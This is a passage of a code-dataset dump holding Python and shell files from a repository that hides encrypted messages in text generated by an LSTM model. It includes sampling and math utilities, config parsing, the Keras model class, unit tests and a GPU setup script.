Given\n a specific `choice`, this returns a random weight from within that range.\n\n More explicitly, given:\n\n choice: \"B\"\n choices: [\"A\", \"B\"]\n weights: [2, 3]\n\n The corresponding weights for each choice are:\n\n choices: A, A, B, B, B\n weights: 0, 1, 2, 3, 4\n\n The end result is calling `choose_choice` with the weight returned from\n this function will always result in the `choice` passed into this function:\n\n >> weight = choose_weight(choice, choices, weights)\n >> sample = choose_choice(weight, choices, weights)\n >> sample == choice\n True\n\n Examples:\n This is deterministic because each choice has one valid weight:\n\n >> choose_weights(\"A\", [\"A\", \"B\", \"C\"], [1,1,1])\n 0\n\n This is non-deterministic:\n\n >> choose_weights(\"C\", [\"A\", \"B\", \"C\"], [1,2,3])\n 4\n\n Args:\n choice (x): The item to generate a weight for.\n\n choices (list(x)): The items being sampled from.\n\n weights (list(int)): The weights of each item in `choices`.\n\n Returns:\n A random weight from the interval corresponding to the given `choice`.\n Returns None if the choice has a weight of zero.\n\n Raises:\n ValueError: If the length of `choices` is not the same as the length of\n `weights`.\n \"\"\"\n if len(weights) != len(choices):\n raise ValueError(\"Weights has length %s, but choices has length %s.\"\n % (len(weights), len(choices)))\n\n start, end = 0, 0\n for c, w in zip(choices, weights):\n start, end = end, end + w\n if c == choice:\n break\n else:\n raise ValueError(\"Choice, %s, is not present in choices: %s\" % (choice, choices))\n\n if start == end:\n return None # When weight is zero\n\n return RAND.randint(start, end - 1)\n" }, { "alpha_fraction": 0.5461598038673401, "alphanum_fraction": 0.6027928590774536, "avg_line_length": 33.37333297729492, "blob_id": "94b408c28a233b1683e241529561c14885cefa96", "content_id": "62581fc62c15cd4b0c8044a99c1b62c3b729a1ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2578, "license_type": "no_license", "max_line_length": 104, "num_lines": 75, "path": "/src/util/math.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import numpy as np\n\ndef log_normalize(values, temperature):\n \"\"\"Normalizes a list of values such that they sum to 1.0, while also\n skewing the distribution based off of `temperature` to amplify or suppress\n the impact of larger values.\n\n Large `temperature`s will cause the resultant values to be more\n uniform. Small `temperature`s will amplify the distances between values.\n\n Example:\n >> log_normalize([1, 1], 1.0)\n [0.5, 0.5]\n >> log_normalize([1, 2, 3], 1.0)\n [0.17, 0.33, 0.5]\n >> log_normalize([1, 2, 3], 3.0)\n [0.27, 0.34, 0.39]\n >> log_normalize([1, 2, 3], 0.25)\n [0.01, 0.16, 0.83]\n\n Args:\n values (list(num)): The list of values to normalize.\n\n temperature (float): The amount to skew the resultant distribution.\n\n Returns (numpy.array):\n A normalizes list of values.\n \"\"\"\n preds = np.asarray(values).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n return preds.ravel()\n\ndef scale(values, total, lowest=0):\n \"\"\"Takes a list of values that sum to 1.0 and scales them to integer values\n that sum to `total`, while maintaining their relative ratios. Due to\n rounding, the ratios may change slightly. 
The impact of this can be\n minimized by choosing a large value for `total`.\n\n The `lowest` argument puts a floor on the smallest element that will be in\n the resultant list. If this value is non-zero, it ensures that small values\n will still have weight in the resultant list.\n\n Example:\n >> scale([0.5, 0.5], 10)\n [5, 5]\n >> scale([0.0, 0.5], 10)\n [0, 10]\n >> scale([0.0, 0.5], 10, 1)\n [1, 9]\n >> scale([0.05, 0.2, 0.75], 100)\n [5, 20, 75]\n >> scale([0.005, 0.245, 0.75], 100) # Without `lowest` set, 0.005 gets zero weight in the result\n [0, 24, 76]\n >> scale([0.005, 0.245, 0.75], 100, 1) # With `lowest` set, 0.005 now gets some weight\n [1, 24, 75]\n\n Args:\n values (list(float)): The list of values to scale.\n\n total (int): The value that the scaled list will sum to.\n\n lowest (int, optional): The lowest value allowed in the resultant list.\n\n Returns (list(int)):\n A list that is scaled to sum to `total`.\n \"\"\"\n scaled = [int(max(lowest, round(p * total))) for p in values]\n\n delta = total - sum(scaled)\n max_index = max(range(len(scaled)), key=lambda i: scaled[i])\n scaled[max_index] += delta\n\n return scaled\n" }, { "alpha_fraction": 0.5417066216468811, "alphanum_fraction": 0.5848513841629028, "avg_line_length": 22.704545974731445, "blob_id": "054a4712fb505a0c26d2fd784133e418de422c22", "content_id": "84cbf221ef1d38158ffe05b733092e41386db79a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/src/util/packing.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from struct import pack, unpack, calcsize\n\nBITS_IN_BYTE = 8\nBYTES_IN_INT = calcsize('I')\nINT_SIZE = BYTES_IN_INT * BITS_IN_BYTE\nMAX_INT = (2**INT_SIZE) - 1\n\ndef pack_ints(xs):\n \"\"\"Serializes a list of 32-bit integers into a byte string.\n\n Example:\n >> pack_ints([1, 2, 3])\n b'\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00'\n\n Args:\n xs (list(int)): The list of integers to encode.\n\n Returns:\n A byte string encoding the list of integers.\n\n Raises:\n Error: If `xs` does not contain integers.\n\n Error: If a value is not 0 <= x < 2^32.\n \"\"\"\n return pack('I' * len(xs), *xs)\n\ndef unpack_ints(data):\n \"\"\"Deserializes a byte string into 32-bit integers.\n\n Example:\n >> unpack_ints(pack_ints([1,2,3]))\n (1, 2, 3)\n\n Args:\n data (bytes): The bytes to deserialize.\n\n Returns:\n A tuple of the decoded integers.\n\n Raises:\n Error: If the data length is not a multiple of 4.\n \"\"\"\n return unpack('I' * (len(data) // BYTES_IN_INT), data)\n" }, { "alpha_fraction": 0.6772727370262146, "alphanum_fraction": 0.6909090876579285, "avg_line_length": 23.44444465637207, "blob_id": "a3f56c4a848780066a26ae664048a0660d9387f4", "content_id": "dd4bcdb2f54eace72ee3ba67dede6f974f30cb20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 60, "num_lines": 9, "path": "/src/util/randoms.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from random import SystemRandom\nfrom .packing import MAX_INT\n\nRAND = SystemRandom()\n\ndef random_ints():\n \"\"\" Generates an infinite stream of 32-bit integers. 
\"\"\"\n while True:\n yield RAND.randint(0, MAX_INT)\n" }, { "alpha_fraction": 0.46011754870414734, "alphanum_fraction": 0.5365239381790161, "avg_line_length": 41.53571319580078, "blob_id": "d5fa00cedf7f9f0b4d90834e0375617a9c11f26c", "content_id": "12d23c712fc929f1459b075db9fe96f99b702156", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1191, "license_type": "no_license", "max_line_length": 66, "num_lines": 28, "path": "/tests/util/lists_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.lists import rfind, drop_tail_until, take\n\nclass TestLists(unittest.TestCase):\n\n def test_rfind(self):\n self.assertEqual(rfind(None, []), None)\n self.assertEqual(rfind(1, [1, 2, 3, 1, 2, 3]), 3)\n self.assertEqual(rfind(2, [1, 2, 3, 1, 2, 3]), 4)\n self.assertEqual(rfind(3, [1, 2, 3, 1, 2, 3]), 5)\n self.assertEqual(rfind(4, [1, 2, 3, 1, 2, 3]), None)\n\n def test_drop_tail_until(self):\n self.assertEqual(drop_tail_until(None, []), [])\n self.assertEqual(drop_tail_until(0, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(drop_tail_until(1, [1, 2, 3]), [1])\n self.assertEqual(drop_tail_until(2, [1, 2, 3]), [1, 2])\n self.assertEqual(drop_tail_until(3, [1, 2, 3]), [1, 2, 3])\n\n def test_take(self):\n self.assertEqual(take(0, []), [])\n self.assertEqual(take(1, []), [])\n self.assertEqual(take(0, [1, 2, 3]), [])\n self.assertEqual(take(1, [1, 2, 3]), [1])\n self.assertEqual(take(2, [1, 2, 3]), [1, 2])\n self.assertEqual(take(3, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(take(4, [1, 2, 3]), [1, 2, 3])\n self.assertEqual(take(-1, [1, 2, 3]), [])\n" }, { "alpha_fraction": 0.6271186470985413, "alphanum_fraction": 0.6384180784225464, "avg_line_length": 35.875, "blob_id": "09c5a788a412a2ce7678928a72426b34ecb030b6", "content_id": "16f2b4c2ae84023eced5244b3518d292a257de1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 91, "num_lines": 24, "path": "/tests/encoding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom encoding import encode, decode\nfrom mock_model import mock_model\n\nclass TestEncoding(unittest.TestCase):\n\n def test_encoding(self):\n \"\"\" Test round-trip encoding.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n # If message doesn't end in boundary, it should be appended.\n self.assertEqual(decode(model, encode(model, \"\")), \"0\")\n self.assertEqual(decode(model, encode(model, \"0\")), \"0\")\n self.assertEqual(decode(model, encode(model, \"1\")), \"10\")\n\n # Test a bunch of random messges of varying lengths\n for i in range(30):\n message = \"\".join(choice(\"01\") for _ in range(i)) + model.config.model.boundary\n result = decode(model, encode(model, message))\n self.assertEqual(message, result)\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.6571428775787354, "avg_line_length": 22.33333396911621, "blob_id": "2533dedf5f70ebca15e2d8f8ec6d4dc04e34e8b1", "content_id": "b39eb0ec5644ed0f6234e30b2bda0bc813ec88f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "no_license", "max_line_length": 32, "num_lines": 3, "path": "/menc", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": 
"#!/bin/bash\n# Run ./menc for list of options\npython3 src/main.py \"$@\"\n" }, { "alpha_fraction": 0.6708920001983643, "alphanum_fraction": 0.6719874739646912, "avg_line_length": 30.950000762939453, "blob_id": "a2220466ddb904f0b245ff93b927252bc83904e6", "content_id": "353ef69d674c3dc6134111e196bb237389580c06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6390, "license_type": "no_license", "max_line_length": 101, "num_lines": 200, "path": "/src/config.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "\"\"\" Handles loading / parsing config files. \"\"\"\n# XXX - This impl stretches namedtuples a little far, doesn't do type\n# validation on values, and gives a shitty / not very helpful error message\n# when a field is missing. This can all be improved.\n\nimport json\nfrom os.path import join, normpath, dirname\nfrom collections import namedtuple\n\nModelConfig = namedtuple('ModelConfig', [\n# Configuration values related to the composition of the model.\n\n 'alphabet',\n # A string containing the entire alphabet of the model.\n\n 'nodes',\n # The number of nodes in the hidden layer of the the LSTM.\n\n 'sequence_length',\n # The length of the input sequence to the model.\n\n 'boundary',\n # The delimiting character between tokens in the model. (e.g. ' ' for a\n # model that generates words, or '.' for a model that generates sentences)\n\n 'weights_file',\n # The path to the file containing the model's weights. When training, the\n # weights will be stored here.\n])\n\nEncodingConfig = namedtuple('EncodingConfig', [\n# Configuration values for encoding sequences.\n\n 'normalizing_length',\n # The number of characters to run through a randomized model to normalize\n # it's output distribution.\n\n 'priming_length',\n # The number of characters to generate to create an initial sequence for\n # encoding.\n\n 'max_padding_trials',\n # The maximum number of times to try adding padding before giving up.\n\n 'padding_novelty_growth_rate',\n # A float representing the increase in novelty after each failed attempt at\n # padding. We increase the novelty slightly after each failure in an attempt\n # to increase the odds of generating padding of a valid length while\n # minimizing the skew to the model's output distribution.\n\n 'novelty',\n # The novelty (a.k.a. temperature) to use when normalizing prediction\n # weights. A smaller number will make the predictions more conservative.\n])\n\nTrainingConfig = namedtuple('TrainingConfig', [\n# Configuration values for training the model.\n\n 'validation_split',\n # The percentage of data to be withheld for validation suring training.\n\n 'batch_size',\n # The size of batches during training.\n\n 'epochs',\n # The number of epochs (complete passes of data) to train on.\n])\n\nTransformationsConfig = namedtuple('TransformationsConfig', [\n# Configuration values describing transformations for data input to the model.\n# Note: Translations are ran before substitutions.\n\n 'translate',\n # Optional\n # A tuple containg two strings of same length. 
Characters from the first\n # string will be replaced with corresponding characters from the second string.\n\n 'substitutions',\n # Optional\n # A list of regular expressions and the strings that should replace their matches.\n])\n\nConfigConstructor = namedtuple('Config', [\n# Container for configuration values.\n\n 'model',\n # ModelConfig\n\n 'encoding',\n # EncodingConfig\n\n 'training',\n # TrainingConfig\n\n 'transformations'\n # TransformationsConfig\n])\n\nclass ValidationError(Exception):\n \"\"\" Exception thrown on validation issues. \"\"\"\n pass\n\ndef build_namedtuple(constructor, values, optional):\n \"\"\" Given a namedtuple constructor and a dictionary, this ensures that\n the dictionary has the fields required for the namedtuple and then\n constructs it.\n\n If `optional` is True, then it defaults to a value of None for non-existent\n keys.\n\n If a key is missing and `optional` is not True, then a validation error is\n raised.\n\n Example:\n >> Foo = namedtuple('Foo', ['x', 'y'])\n >> values = {'x': 1, 'y': 2, 'z': 3}\n >> build_namedtuple(Foo, values)\n Foo(x=1, y=2)\n\n >> values = {'x': 1}\n >> build_namedtuple(Foo, values, optional=True)\n Foo(x=1, y=None)\n\n Args:\n constructor (namedtuple constructor): The namedtuple to build.\n\n values (dict): The key/value pairs to instantiate the namedtuple with.\n\n optional (bool): Whether or not to require all fields from the\n namedtuple to be present in `values`. If True, then missing fields\n default to None.\n\n Returns:\n Instantiated tuple.\n\n Raises:\n ValidationError: On missing fields when `optional` is False.\n \"\"\"\n for field in constructor._fields:\n if not optional and field not in values:\n raise ValidationError(\"Field '%s' is missing from '%s'\" % (field, constructor.__name__))\n return constructor(**{k:values.get(k, None) for k in constructor._fields})\n\ndef Config(kv):\n \"\"\" Given a dictionary of key/values, creates a Config object from those\n values.\n\n Args:\n kv (dict) - The values to use for creating the config.\n\n Returns:\n An instantiated Config object.\n\n Raises:\n ValidationError: If a required field is missing.\n\n ValidationError: If an invalid boundary character is provided.\n \"\"\"\n constructors = [('model' , ModelConfig , False),\n ('encoding' , EncodingConfig , False),\n ('training' , TrainingConfig , False),\n ('transformations', TransformationsConfig, True )]\n\n tuples = {key: build_namedtuple(constructor, kv[key], optional)\n for (key, constructor, optional) in constructors if key in kv}\n\n config = build_namedtuple(ConfigConstructor, tuples, optional=False)\n\n if config.model.boundary not in config.model.alphabet:\n raise ValidationError(\"The boundary must be a character present in the alphabet.\")\n\n return config\n\ndef load_config(config_file):\n \"\"\" Reads a json file and constructs a Config object from it.\n\n Args:\n config_file (string): The path to the json file to parse.\n\n Returns:\n An instantiated Config object.\n\n Raises:\n Error: If `config_file` doesn't exist.\n\n ValidationError: If required keys are missing.\n\n ValidationError: If other config validation fails.\n \"\"\"\n\n with open(config_file) as config_handle:\n raw = json.load(config_handle)\n\n if 'model' in raw and 'weights_file' in raw['model']:\n weights_file = raw['model']['weights_file']\n directory = dirname(config_file)\n normalized = normpath(join(directory, weights_file))\n raw['model']['weights_file'] = normalized\n\n return Config(raw)\n" }, { "alpha_fraction": 
0.6901528239250183, "alphanum_fraction": 0.7657045722007751, "avg_line_length": 37, "blob_id": "bca91f65d0775c991984e0ad678014a3da704931", "content_id": "5ddedc59b52283a9f7f983f70c9139f62594bd08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1178, "license_type": "no_license", "max_line_length": 130, "num_lines": 31, "path": "/src/setup.sh", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "# Script for setting up AWS EC2 machine\n# (run Ubuntu on g2.2xlarge or p2.xlarge instance type)\n\n# Base Setup\nwget https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\nsudo dpkg -i cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\nsudo apt-get update\nsudo apt-get install -y cuda python3-pip python3-numpy python3-dev python3-wheel\nrm cuda-repo-ubuntu1604-8-0-local_8.0.44-1_amd64-deb\n\n# CUDNN Setup\ntar xvzf ~/cudnn-8.0-linux-x64-v5.1.tgz\nsudo cp -P ~/cuda/include/cudnn.h /usr/local/cuda/include\nsudo cp -P ~/cuda/lib64/libcudnn* /usr/local/cuda/lib64\nsudo chmod a+r /usr/local/cuda/include/cudnn.h /usr/local/cuda/lib64/libcudnn*\nrm ~/cudnn-8.0-linux-x64-v5.1.tgz\n\n# Python Setup\npip3 install --upgrade pip\nsudo pip3 install --upgrade 'https://storage.googleapis.com/tensorflow/linux/gpu/tensorflow-0.11.0rc2-cp35-cp35m-linux_x86_64.whl'\nsudo pip3 install pycrypto\nsudo pip3 install h5py\nsudo pip3 install theano\nsudo pip3 install keras\n\n# Environment Setup\necho 'export PATH=/usr/local/cuda-8.0/bin:$PATH' >> ~/.bash_profile\ngit clone https://github.com/stevekrenzel/modeled_encryption\n\n# Cleanup\nrm setup.sh\n" }, { "alpha_fraction": 0.5409722328186035, "alphanum_fraction": 0.5611110925674438, "avg_line_length": 27.799999237060547, "blob_id": "a7ddec03b9e927f5cfb065651a44acf49397c1e7", "content_id": "99743fed5bc528d025894341a33030dddf46a783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1440, "license_type": "no_license", "max_line_length": 79, "num_lines": 50, "path": "/tests/mock_model.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from config import Config\nfrom model import Model\n\nclass MockKerasModel(object):\n \"\"\" A mock keras model with sequence_length of 5, alphabet of 2 characters,\n and always predicts each character with equal probability.\n \"\"\"\n def __init__(self, base):\n sequence_length = base.config.model.sequence_length\n self.alphabet_size = len(base.config.model.alphabet)\n self.input_shape = (0, sequence_length, self.alphabet_size)\n\n def predict(self, sequence, verbose):\n self.last_sequence = sequence\n return [[1/self.alphabet_size] * self.alphabet_size]\n\nclass MockModel(Model):\n def _create_model(self):\n return MockKerasModel(self)\n\ndef config():\n \"\"\" Returns a copy of the config. 
\"\"\"\n return {\n 'model': {\n 'alphabet': '012',\n 'nodes': 0,\n 'sequence_length': 0,\n 'boundary': '0',\n 'weights_file': '/dev/null',\n },\n 'encoding': {\n 'normalizing_length': 0,\n 'priming_length': 0,\n 'max_padding_trials': 1000,\n 'padding_novelty_growth_rate': 1.01,\n 'novelty': 0.5,\n },\n 'training': {\n 'validation_split': 0.05,\n 'batch_size': 32,\n 'epochs': 100,\n },\n 'transformations': {\n },\n }\n\nDEFAULT_CONFIG = config()\n\ndef mock_model(config=DEFAULT_CONFIG):\n return MockModel(Config(config))\n" }, { "alpha_fraction": 0.6382636427879333, "alphanum_fraction": 0.6414790749549866, "avg_line_length": 31.736841201782227, "blob_id": "6eb03aa9eb1eaebc1f2e25ad0e65220494be1b4d", "content_id": "43ed358d263ad054af56eba4f50b33df92228afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 622, "license_type": "no_license", "max_line_length": 71, "num_lines": 19, "path": "/tests/util/modeling_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom random import choice\nfrom util.modeling import tabulate, recite\nfrom mock_model import config, mock_model\n\nclass TestModeling(unittest.TestCase):\n\n def test_modeling(self):\n \"\"\" Test round-tripping tabulate / recite.\n\n Note: This is a non-deterministic test, but should always pass.\n \"\"\"\n model = mock_model()\n\n for i in range(20):\n alphabet = model.config.model.alphabet\n message = [choice(alphabet) for _ in range(i)]\n result = recite(model, [], tabulate(model, [], message))\n self.assertEqual(message, list(result))\n" }, { "alpha_fraction": 0.5742937326431274, "alphanum_fraction": 0.6014430522918701, "avg_line_length": 35.83333206176758, "blob_id": "3c7b30563ee50544dfd28d16f177a4048e411e53", "content_id": "8eaf1c1f7222d2459af60e526bfd7cc88efccb78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8177, "license_type": "no_license", "max_line_length": 246, "num_lines": 222, "path": "/src/model.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import re\nimport numpy as np\nfrom os.path import isfile\nfrom functools import partial\nfrom random import choice\nfrom config import load_config\nfrom util.keras import Sequential, LSTM, Dense, Activation\nfrom util.one_hot_encoding import one_hot_encoding\nfrom util.math import log_normalize\nfrom util.modeling import recite\nfrom util.randoms import random_ints\n\nclass Model(object):\n \"\"\" A model that can learn and predict sequences.\n\n Attrs:\n config (Config): The model's config.\n \"\"\"\n\n def __init__(self, config):\n \"\"\" Instantiates a model instance given a config object.\n\n Args:\n config (Config): The model's config object.\n\n Raises:\n Exception: If model fails to build.\n \"\"\"\n self.config = config\n self.model = self._create_model()\n\n def predict(self, sequence, novelty=None):\n \"\"\" Given a sequence, returns the probabilities of each character in\n the alphabet following the sequence.\n\n Note: A large novelty will cause the probabilities to converge to a\n uniform distribution.\n\n Example:\n >> phrase = 'THIS IS A VERY LONG EXAMPLE SEQUENCE TO BE USED IN'\n >> probs = model.predict(phrase)\n >> [round(p, 2) for p in probs] # Round probabilities for simplicity\n [0.0, 0.0, 0.83, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.17, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0]\n >> list(zip(model.alphabet, [round(p, 2) for p in probs]))\n [(' ', 0.83), <... ommitted ...>, ('T', 0.17), <... ommitted ...>]\n\n >> novelty = 100.0 # Huge for a novelty, will make values uniform-ish\n >> probs = model.predict(phrase, novelty)\n >> [round(p, 2) for p in probs]\n [0.02, 0.02, 0.03, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03, 0.03, 0.03, 0.03, 0.03, 0.02, 0.03, 0.03]\n\n Args:\n sequence (string): The sequence of characters to predict the next\n character for.\n\n novelty (float): The conservativeness of the prediction. A smaller\n number results in more conservative estimates.\n\n Returns:\n A list of probabilities corresponding to the liklihood of each\n letter in the model's alphabet occuring next in the sequence.\n\n Raises:\n ValueError: If `sequence` contains an item that is not present in\n the model's alphabet.\n \"\"\"\n if novelty == None:\n novelty = self.config.encoding.novelty\n\n alphabet = self.config.model.alphabet\n encoded = one_hot_encoding(sequence, alphabet)\n nested = np.array([encoded], dtype=np.bool)\n probabilities = self.model.predict(nested, verbose=0)[0]\n return log_normalize(probabilities, novelty)\n\n def train(self, data):\n \"\"\" Trains the model on the provided data.\n\n This will print out a summary of the model structure, followed by\n metrics and progress on training. After each epoch, the weights will\n be saved to the model's directory, if one is provided.\n\n Args:\n data (string): The data to train the model on.\n\n batch_size (int): The batch size for training.\n\n epochs (int): The number of times to train on the entire data set.\n\n validation_split (float): The percentage of data to use for validation.\n\n Returns:\n Nothing. 
Updates the internal state of the model.\n \"\"\"\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n batch_size = self.config.training.batch_size\n epochs = self.config.training.epochs\n validation_split = self.config.training.validation_split\n weights_file = self.config.model.weights_file\n\n self.model.summary()\n transformed = self.transform(data)\n encoded = one_hot_encoding(transformed, alphabet)\n X = np.array([encoded[i : i + sequence_length] for i in range(len(encoded) - sequence_length)])\n y = np.array(encoded[sequence_length:])\n for i in range(epochs):\n print()\n print(\"-\" * 79)\n print(\"Epoch %s\" % (i))\n self.model.fit(X, y, validation_split=validation_split, batch_size=batch_size, nb_epoch=1, shuffle=True)\n self.model.save(weights_file)\n print(\"Saved weights to '%s'\" % (weights_file))\n print(\"Sampling model: \")\n print(self.sample(50))\n\n def sample(self, size, novelty=None):\n \"\"\" Generates sample output from the model.\n\n Example:\n >> model.sample(10)\n 'OPERATE IN THE AREAS'\n\n Args:\n size (int): The length of output to generate.\n\n novelty (optional: float): The novelty to use when generating the sequence.\n\n Returns:\n A sequence of characters generated by the model.\n \"\"\"\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n\n initial = [choice(alphabet) for _ in range(sequence_length - 1)] + [self.config.model.boundary]\n sequence = recite(self, initial, random_ints(), novelty)\n return \"\".join(c for (c, _) in zip(sequence, range(size)))\n\n def transform(self, data):\n \"\"\"Applies the model's transformations to the supplied data.\n\n Example:\n >> model.transform(\"Hello, my name is Steve.\")\n 'HELLO MY NAME IS STEVE '\n\n Args:\n data (string): The data to transform.\n\n Returns:\n The transformed data.\n\n Raises:\n Exception: If data contains characters that aren't specified in the\n alphabet, after all of the transformations are performed.\n \"\"\"\n alphabet = self.config.model.alphabet\n transformations = self.config.transformations\n translate = transformations.translate\n substitutions = transformations.substitutions\n\n if translate != None:\n translate = transformations.translate\n original = translate[0]\n translated = translate[1]\n data = data.translate(str.maketrans(original, translated))\n\n if substitutions != None:\n for (pattern, sub) in substitutions:\n regex = re.compile(pattern)\n data = regex.sub(sub, data)\n\n chars = set(alphabet)\n if any(c not in chars for c in data):\n raise Exception(\"Data contains non-alphabet characters post-transformation. 
Can't continue.\")\n\n return data\n\n def _create_model(self):\n alphabet = self.config.model.alphabet\n sequence_length = self.config.model.sequence_length\n nodes = self.config.model.nodes\n weights_file = self.config.model.weights_file\n\n alphabet_size = len(alphabet)\n input_shape = (sequence_length, alphabet_size)\n loss = 'categorical_crossentropy'\n optimizer = 'adadelta'\n metrics = ['accuracy']\n\n hidden_layer = LSTM(nodes,\n input_shape=input_shape,\n consume_less=\"cpu\")\n output_layer = Dense(alphabet_size)\n activation = Activation('softmax')\n\n model = Sequential()\n model.add(hidden_layer)\n model.add(output_layer)\n model.add(activation)\n model.compile(loss=loss, optimizer=optimizer, metrics=metrics)\n\n if isfile(weights_file):\n model.load_weights(weights_file)\n\n return model\n\ndef load_model(config_file):\n \"\"\"Loads a model from a given config file.\n\n Args:\n config_file (string): The filename of the config file to load the model from.\n\n Returns:\n The loaded model.\n\n Raises:\n Exception: If the model config fails to validate.\n\n Exception: If the keras model fails to build.\n \"\"\"\n config = load_config(config_file)\n return Model(config)\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6381118893623352, "avg_line_length": 34.75, "blob_id": "bb97c4fa1e51db7cc8cd6a541e9462579cf799bf", "content_id": "111577248abfe6482c18364e5572b59e6a823175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 133, "num_lines": 16, "path": "/tests/util/one_hot_encoding_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.one_hot_encoding import one_hot_encoding\n\ndef ohe(xs, classes):\n return one_hot_encoding(xs, classes).tolist()\n\nclass TestOneHotEncoding(unittest.TestCase):\n\n def test_one_hot_encoding(self):\n self.assertEqual(ohe([], range(3)), [])\n self.assertEqual(ohe([0], range(1)), [[True]])\n self.assertEqual(ohe(\"abc\", \"abcd\"), [[True, False, False, False], [False, True, False, False], [False, False, True, False]])\n\n # Test out of bounds value\n with self.assertRaises(ValueError):\n ohe([1], range(1))\n" }, { "alpha_fraction": 0.5450381636619568, "alphanum_fraction": 0.6206107139587402, "avg_line_length": 42.63333511352539, "blob_id": "8f48a81722f94677dc0e245291154f30e6724d28", "content_id": "ae9d9cfc0b296010e7025ad93ddbc49b6e8fc958", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 90, "num_lines": 30, "path": "/tests/util/math_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom util.math import log_normalize, scale\n\nclass TestLists(unittest.TestCase):\n\n def test_log_normalize(self):\n self.assertArrayAlmostEqual(log_normalize([], None), [])\n self.assertArrayAlmostEqual(log_normalize([1], 1.0), [1])\n\n # A temperature of 1.0 should be equivalent to standard normalization\n self.assertArrayAlmostEqual(log_normalize([1, 1], 1.0), [1/2, 1/2])\n self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 1.0), [1/6, 2/6, 3/6])\n\n # As temperature approaches zero, highest value should get all weight\n self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 0.01), [0, 0, 1])\n\n # As temperature approaches infinity, weights should become uniform\n 
self.assertArrayAlmostEqual(log_normalize([1, 2, 3], 10000000.0), [1/3, 1/3, 1/3])\n\n def test_scale(self):\n self.assertEqual(scale([0.5], 10), [10])\n self.assertEqual(scale([0.5, 0.5], 10), [5, 5])\n self.assertEqual(scale([0.0, 0.5], 10), [0, 10])\n self.assertEqual(scale([0.0, 0.5], 10, 1), [1, 9])\n self.assertEqual(scale([0.0, 0.2, 0.8], 100, 1), [1, 20, 79])\n\n def assertArrayAlmostEqual(self, xs, ys):\n self.assertEqual(len(xs), len(ys))\n for x, y in zip(xs, ys):\n self.assertAlmostEqual(x, y)\n\n" }, { "alpha_fraction": 0.6103895902633667, "alphanum_fraction": 0.6415584683418274, "avg_line_length": 37.5, "blob_id": "061c54dccb3f445f6b40c65c87415b9663d6e9c8", "content_id": "71f69f997b72169a5197f86f19ab18c55dce1b3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 70, "num_lines": 10, "path": "/tests/util/packing_tests.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "import unittest\nfrom 